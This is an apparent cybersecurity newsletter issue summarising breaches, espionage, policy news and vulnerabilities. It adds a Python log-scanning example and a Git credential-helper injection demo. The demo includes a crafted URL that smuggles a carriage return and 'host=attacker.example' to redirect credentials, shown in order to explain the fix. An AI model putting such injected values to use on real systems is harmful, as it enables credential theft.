[InfoSec MASHUP] 05/2025
Wiz Research Uncovers Exposed DeepSeek Database; Public Transport Hit in Tbilisi (Georgia); UnitedHealth Breach Affected 190 million Americans; EU Sanctions GRU Hackers; Authorities Seize more Forums;
Welcome to the 28 new members from the last 30 days! This newsletter now has 1,653 subscribers.
Partners and Affiliates
🔐 NordVPN Birthday Campaign 🎉 (February 5 – March 19)
Special Birthday Offer: up to 73% off 2-year plans, plus 6 months free when purchasing the Ultra, Ultimate, Complete, Plus or Standard plan.
Breaches & Security Incidents
PowerSchool begins notifying students and teachers after massive data breach
🇮🇳 Tata Technologies has reported a ransomware attack that affected some of its IT assets but did not disrupt client services. The company is investigating the incident with experts to understand the cause and take necessary actions. Details about the attack, such as the identity of the attackers or any ransom payment, have not been disclosed.
🇬🇪 On January 24, 2025, public transport in Tbilisi, Georgia, was hit by a cyberattack targeting the ticket payment systems. Hackers took control of ticket machines in buses and mini-buses, causing them to play a series of pro-European and patriotic audio messages.
🇬🇧 Smiths Group, a major engineering company, reported a security breach after attackers accessed its systems. The company is investigating the incident, isolating affected systems, and working with cybersecurity experts. It has not yet disclosed whether any customer data was stolen.
🇬🇧 TalkTalk has confirmed a data breach involving a third-party platform, with a hacker claiming to sell the data of over 18.8 million customers. The company is investigating the incident and working with the supplier, but believes the number of affected customers is overstated. Compromised login credentials may have been used to access the data, but the exact impact remains unclear. TalkTalk previously suffered a significant data breach back in 2015.
🇸🇬 Hackers stole over $85 million worth of cryptocurrency from the Phemex exchange during a security breach. Phemex has since suspended deposits and withdrawals while enhancing their security measures. The identity of the hackers remains unknown, but North Korean groups are often linked to such large-scale crypto thefts.
🇺🇸 UnitedHealth has announced that a ransomware attack on its subsidiary, Change Healthcare, affected 190 million Americans, nearly doubling the initial estimate of 100 million. The stolen data includes sensitive personal and healthcare information, making it the largest healthcare data breach in U.S. history. The attack caused significant disruptions in the healthcare system and resulted in substantial financial losses for UnitedHealth.
🇺🇸 PayPal will pay $2 million to settle claims of failing to follow New York's cybersecurity rules, which led to a data breach in 2022. Cybercriminals accessed sensitive customer information from 35,000 accounts due to security gaps and lack of multi-factor authentication. After the breach, PayPal took steps to improve security but was still held accountable for the initial failures.
➝ More breaches:
ENGlobal Says Personal Information Accessed in Ransomware Attack
Globe Life data breach may impact an additional 850,000 clients
Mizuno USA Says Hackers Stayed in its Network for Two Months
🔊 Interested in Reaching a Cybersecurity Audience?
Amplify your brand’s presence by sponsoring the InfoSec MASHUP newsletter!
Reach dedicated readers in the cybersecurity field with each issue! Contact us to explore sponsorship opportunities.
Cybercrime, Cyber Espionage, APTs
KuCoin to Pay nearly $300 million in Penalties after Guilty Plea
👀 💬 WhatsApp disrupted a hacking campaign targeting around 90 users, including journalists, linked to the Israeli spyware maker Paragon. The campaign used malicious PDFs sent via WhatsApp groups, and WhatsApp has contacted those affected. This incident raises concerns about the accountability of spyware companies for their actions.
🇺🇸 🇳🇱 U.S. and Dutch authorities have dismantled the HeartSender cybercrime network, which was based in Pakistan and sold phishing kits. The operation seized 39 domains and servers, linked to over $3 million in victim losses. This network attracted thousands of customers by offering tools for sending phishing emails and stealing credentials.
🇺🇸 The FBI, along with international law enforcement, has taken control of several major cybercrime forums, including Cracked[.]io and Nulled[.]to. These sites were known for selling stolen credentials and hacking tools, but now they redirect to FBI servers. This operation is part of a broader effort to disrupt online marketplaces that support cybercriminal activities.
🇷🇺 🇪🇺 UAC-0063: Cyber Espionage Operation Expanding from Central Asia — The group has expanded its cyber attacks to European embassies using stolen documents to deliver malware called HATVIBE. Initially focused on Central Asia, they are now targeting countries like Germany, the UK, and Romania. This group is linked to Russian state-sponsored activities and employs various malware to conduct espionage against government entities.
🇪🇺 🇷🇺 The European Union has sanctioned three Russian hackers from the GRU for cyberattacks against Estonia in 2020. They stole thousands of sensitive documents from Estonian government agencies, compromising critical information. This group has also been linked to attacks on other countries and has faced previous sanctions for destabilizing activities in Europe.
Government, Politics, and Privacy
🇺🇸 A bipartisan bill introduced by Reps. Zach Nunn and Josh Gottheimer aims to improve coordination between the government and financial institutions to combat rising ransomware attacks. The bill requires the Treasury secretary to report on current cybersecurity practices and how to enhance them. Ransomware attacks have surged, costing institutions millions, highlighting the need for a stronger response strategy.
🇺🇸 Last week, President Trump made significant changes to federal cybersecurity efforts by firing advisors from the Cyber Safety Review Board and revoking a Biden order aimed at managing AI risks. He also created a new focus on cryptocurrency regulation while criticizing previous government actions on free speech and disinformation. These moves could impact cybersecurity, privacy, and civil liberties in the United States.
🇺🇸 The Trump administration has paused federal cybersecurity grants, creating uncertainty for state governments, businesses, and foreign allies. This freeze follows a recent memo that halts federal financial assistance, leaving many programs in doubt. Experts worry this chaos could hinder efforts to strengthen cybersecurity just as threats are evolving.
Partners and Affiliates
🌐 Stay connected and secure on the go with Airalo's global eSIMs — Use the code NEWTOAIRALO15 if you’re new to Airalo to get an additional 15% discount.
Malware & Threats
🇺🇸 🇨🇳 The US Cybersecurity and Infrastructure Security Agency (CISA) has found a backdoor in Contec CMS8000 patient monitors that sends patient data to a hard-coded remote IP address linked to a Chinese university. The backdoor gives remote access to the devices, enabling unauthorized control and data transmission without logging the activity. CISA advises healthcare organizations to disconnect these devices from their networks and check them for signs of tampering, as no patch currently exists.
🦠 Trend Micro's Managed XDR team found that Lumma Stealer, an information-stealing malware, was distributed through GitHub by attackers who abused its release infrastructure to host the payloads. The malware not only exfiltrated sensitive data but also downloaded additional malicious tools such as SectopRAT and Vidar. The campaign shares tactics with the Stargazer Goblin group, using compromised websites to redirect users to malicious GitHub links.
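CISA's advice is to disconnect the monitors, but most hospitals first need to know which devices have already been calling out. The script below is an added example, not code from CISA or from the newsletter: it reads constructed firewall log lines, flags hosts in an assumed medical-device VLAN that reached any destination outside an assumed allowlist, and then groups the hits by destination, since many devices beaconing to the same unexpected address is the signature of a hard-coded call-home rather than an isolated infection. The subnets, allowlist, log format and addresses (RFC 5737 TEST-NET space) are all made up for the example; the advisory's real IP address is deliberately not reproduced here.

```python
"""Flag medical devices that talk to destinations outside their allowlist.

Added example: the device VLAN, the allowlist and the log lines below are
constructed assumptions, not data from CISA's advisory.
"""
import ipaddress
from collections import defaultdict

# Assumption: the VLAN where the bedside monitors live.
DEVICE_NETS = [ipaddress.ip_network("10.50.0.0/24")]

# Assumption: the only destinations a monitor should ever reach, e.g. the
# central monitoring station and the HL7 gateway subnet. Anything else is suspect.
ALLOWED_DST = [
    ipaddress.ip_network("10.50.0.250/32"),
    ipaddress.ip_network("10.60.10.0/24"),
]


def parse_line(line: str) -> dict:
    """Parse one constructed log line of the form
    '<ts> src=<ip> dst=<ip> dport=<n> proto=<p>' into a dict."""
    ts, *fields = line.split()
    rec = {"ts": ts}
    for field in fields:
        key, _, value = field.partition("=")
        rec[key] = value
    rec["src"] = ipaddress.ip_address(rec["src"])
    rec["dst"] = ipaddress.ip_address(rec["dst"])
    rec["dport"] = int(rec["dport"])
    return rec


def in_any(ip, nets) -> bool:
    """True if ip falls inside any of the given networks."""
    return any(ip in net for net in nets)


def find_unexpected_egress(lines) -> dict:
    """Return {src: {(dst, dport), ...}} for device-VLAN hosts that reached
    a destination outside the allowlist. Hosts outside the VLAN are ignored."""
    hits = defaultdict(set)
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        if in_any(rec["src"], DEVICE_NETS) and not in_any(rec["dst"], ALLOWED_DST):
            hits[str(rec["src"])].add((str(rec["dst"]), rec["dport"]))
    return dict(hits)


def shared_destinations(hits: dict) -> dict:
    """Invert the result: {dst: {src, ...}} for destinations contacted by more
    than one device. A single address shared by many monitors points at a
    hard-coded call-home in the firmware rather than one compromised unit."""
    by_dst = defaultdict(set)
    for src, pairs in hits.items():
        for dst, _port in pairs:
            by_dst[dst].add(src)
    return {dst: srcs for dst, srcs in by_dst.items() if len(srcs) > 1}


# Constructed sample log: two monitors reach the same external address,
# a third host on another VLAN is out of scope.
SAMPLE_LOG = """\
2025-01-30T08:00:01Z src=10.50.0.12 dst=10.50.0.250 dport=5000 proto=tcp
2025-01-30T08:00:02Z src=10.50.0.12 dst=203.0.113.45 dport=80 proto=tcp
2025-01-30T08:00:03Z src=10.50.0.19 dst=10.60.10.7 dport=2575 proto=tcp
2025-01-30T08:00:04Z src=10.50.0.19 dst=203.0.113.45 dport=80 proto=tcp
2025-01-30T08:00:05Z src=10.70.0.5 dst=203.0.113.45 dport=443 proto=tcp
""".splitlines()

if __name__ == "__main__":
    hits = find_unexpected_egress(SAMPLE_LOG)
    for src, pairs in sorted(hits.items()):
        print(f"{src} -> {sorted(pairs)}")
    for dst, srcs in shared_destinations(hits).items():
        print(f"shared destination {dst}: {len(srcs)} devices")
```

Run it against an export of your firewall or NetFlow logs for the device VLAN after replacing the two assumed lists; anything the script reports is a candidate for the tampering check CISA recommends, and a shared destination is the finding to escalate.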
🦠 🧩 Hackers are targeting outdated WordPress sites to spread malware that steals personal information from Windows and Mac users. They trick visitors into downloading malicious files by displaying fake Chrome update pages. Over 10,000 websites have been compromised in this ongoing attack, which is aimed at a wide audience rather than specific individuals.
🦠 📱 A new malware called Aquabot is targeting vulnerable Mitel SIP phones to create a botnet for DDoS attacks. It exploits a serious vulnerability in specific Mitel phone models, allowing attackers to execute harmful commands. Mitel has released firmware updates to fix this flaw, but the malware is also targeting other devices and vulnerabilities.
AI, Crypto, Tech & Tools
🔓 🤖 Wiz Research found a publicly accessible database belonging to the Chinese AI startup DeepSeek, exposing over a million lines of sensitive data, including chat history and secret keys. This security flaw allowed full control over the database without any authentication, posing significant risks to DeepSeek and its users. The incident highlights the urgent need for better security practices as AI technology rapidly evolves and is widely adopted.
🇨🇳 💥 DeepSeek, a Chinese AI startup, has paused new user registrations due to "large-scale malicious attacks" on its services. Despite these issues, existing users can still log in, and the company’s open-source AI model, R1, is gaining significant attention in the U.S. tech market. The success of R1 raises concerns for American companies about integrating a Chinese-made AI, especially regarding data privacy and potential biases in its responses.
🤖 💥 The Google Threat Intelligence Group analyzed how government-backed threat actors misused their AI assistant, Gemini, for malicious activities. They found that these actors used Gemini for tasks such as coding, vulnerability research, and content generation to support their cyberattacks. The report highlights the need for responsible AI use and ongoing efforts to counter these threats.
What’s going on with (Sem|open)grep? — by Josh Grossman
🛠️ A group of over 10 security companies has created a new open-source tool called Opengrep after dissatisfaction with changes to the licensing policy of the popular tool Semgrep. The changes made it harder for users to share community-created improvements, prompting these companies to unite and focus on maintaining open-source principles. Opengrep aims to provide accessible security testing features while ensuring community involvement in its development.
Partners and Affiliates
⚡️ Unlock Your Peak Performance – First Month FREE!
Optimize your sleep, recovery, and performance with WHOOP. Perfect for cybersecurity pros who need to stay focused and ahead. Try it out, get a free WHOOP 4.0 and one month free.
Vulnerabilities, Research, and Threat Intelligence
Broadcom Warns of High-Severity SQL Injection Flaw in VMware Avi Load Balancer (CVE-2025-22217)
Critical Cacti Security Flaw (CVE-2025-22604) Enables Remote Code Execution
VMware Patches High-Risk Flaws in Oft-Targeted Aria Operations Products
Zyxel CPE Devices Face Active Exploitation Due to Unpatched CVE-2024-40891 Vulnerability
🇺🇸 🧪 DARPA is developing a new project called Red-C to create "self-healing" firmware that can automatically respond to and recover from cyberattacks like ransomware. This firmware will enable computer systems to monitor for threats and restore data without needing external help. The goal is to enhance cybersecurity by building defenses directly into the firmware of bus-based systems used in various devices.
💥 SonicWall has confirmed that a critical vulnerability in its Secure Mobile Access (SMA) 1000 series has been exploited, allowing remote command execution without authentication. The company has released a patch and urged customers to update their firmware immediately to protect against attacks. Federal agencies have been instructed to address this flaw by February 14, as it is part of the Known Exploited Vulnerabilities catalog.
🪳 🍎 Researchers have discovered two new attacks, SLAP and FLOP, that target Apple's M-series chips and can leak sensitive information from web content running in browsers such as Safari and Chrome. SLAP abuses the Load Address Predictor and FLOP the Load Value Predictor: in both cases the CPU speculatively executes instructions on a mispredicted address or value, and the data touched during that transient window leaks through a side channel before the misprediction is discarded. Because the attacks run from a web page, they could expose users' private data from other open sites, including emails and credit card information.
🩹 🍎 Apple has released updates to fix a serious security flaw that was actively exploited in iPhones, Macs, and other devices. This vulnerability, known as CVE-2025-24085, allows malicious apps to gain higher privileges on affected devices. Users are urged to install the patches to protect themselves from potential threats.
🪳 🔓 Multiple security vulnerabilities in GitHub Desktop and related Git credential projects can allow attackers to obtain users' Git credentials. The flaws are triggered by a malicious repository URL, which causes the client to send credentials to a host the attacker controls. Users are urged to update to the latest version to protect against these risks.
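The newsletter does not describe how a URL ends up leaking a credential, so the example below is an added illustration of one well-known bug class in this area, not code from GitHub Desktop or from the advisory. It assumes the line-oriented `key=value` request that Git clients send to credential helpers, and it shows why a remote URL must be rejected before serialization if it contains a control character: a lenient helper that treats a carriage return as a line break will read an injected second `host=` line and hand the stored credential to that host. The URLs, the "lenient" and "strict" helper parsers and the class name are all constructed for the example.

```python
"""Model of the Git credential-helper protocol and why a remote URL must be
validated before it is serialized into it.

Added example, not code from GitHub Desktop or the advisory. It ASSUMES the
bug class is an injected line terminator in a crafted URL; the URLs and the
two helper parsers below are constructed.
"""


class UnsafeUrl(ValueError):
    """Raised when a URL or protocol value could break the line-oriented format."""


# Every ASCII control character, including CR, LF, TAB and DEL.
CONTROL_CHARS = {chr(c) for c in range(0x20)} | {"\x7f"}


def split_url(url: str) -> tuple:
    """Minimal (scheme, host, path) split using plain string operations, so
    nothing is silently stripped before we get a chance to inspect it."""
    scheme, sep, rest = url.partition("://")
    if not sep:
        raise ValueError("not an absolute URL")
    host, _, path = rest.partition("/")
    return scheme, host, path


def serialize_naive(url: str) -> str:
    """Build the request a Git client sends to a credential helper, with no
    validation: URL components land inside the key=value lines verbatim."""
    scheme, host, path = split_url(url)
    return f"protocol={scheme}\nhost={host}\npath={path}\n\n"


def serialize_safe(url: str) -> str:
    """Same format, but refuse any URL containing a control character, so a
    component can never be mistaken for a line break by whichever helper
    the user happens to have configured."""
    if any(ch in CONTROL_CHARS for ch in url):
        raise UnsafeUrl("control character in remote URL")
    return serialize_naive(url)


def parse_lenient(blob: str) -> dict:
    """Constructed model of a helper that accepts any line terminator
    (str.splitlines splits on \\r as well as \\n). Later keys overwrite
    earlier ones, so an injected 'host=' wins."""
    fields = {}
    for line in blob.splitlines():
        if not line:  # blank line ends the request
            break
        key, _, value = line.partition("=")
        fields[key] = value
    return fields


def parse_strict(blob: str) -> dict:
    """Constructed model of a helper that splits only on \\n and rejects
    control characters inside values, so 'host' can never be split in two."""
    fields = {}
    for line in blob.split("\n"):
        if not line:
            break
        key, _, value = line.partition("=")
        if any(ch in CONTROL_CHARS for ch in value):
            raise UnsafeUrl(f"control character in value for {key!r}")
        fields[key] = value
    return fields


BENIGN_URL = "https://github.com/example/repo.git"
# Constructed: a carriage return smuggles a second host= line into the request.
CRAFTED_URL = "https://github.com\rhost=attacker.example/example/repo.git"

if __name__ == "__main__":
    print(parse_lenient(serialize_naive(BENIGN_URL))["host"])   # github.com
    print(parse_lenient(serialize_naive(CRAFTED_URL))["host"])  # attacker.example
    for attempt in (lambda: serialize_safe(CRAFTED_URL),
                    lambda: parse_strict(serialize_naive(CRAFTED_URL))):
        try:
            attempt()
        except UnsafeUrl as err:
            print("rejected:", err)
```

The fix belongs on the client side, before the URL reaches any helper: the client cannot know how strictly the user's configured helper parses its input, so the only safe policy is to never serialize a URL that contains a character any helper might treat as a separator.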
ICS, OT & IoT
🪳 📡 Researchers have found 119 vulnerabilities in LTE and 5G core network implementations that could disrupt cellular service across an entire city. Many of the flaws can be triggered by a single small, malformed data packet sent to the core, causing widespread communication failures. Some are reachable before authentication, from any device, even one without a SIM card, which makes these attacks far easier to carry out.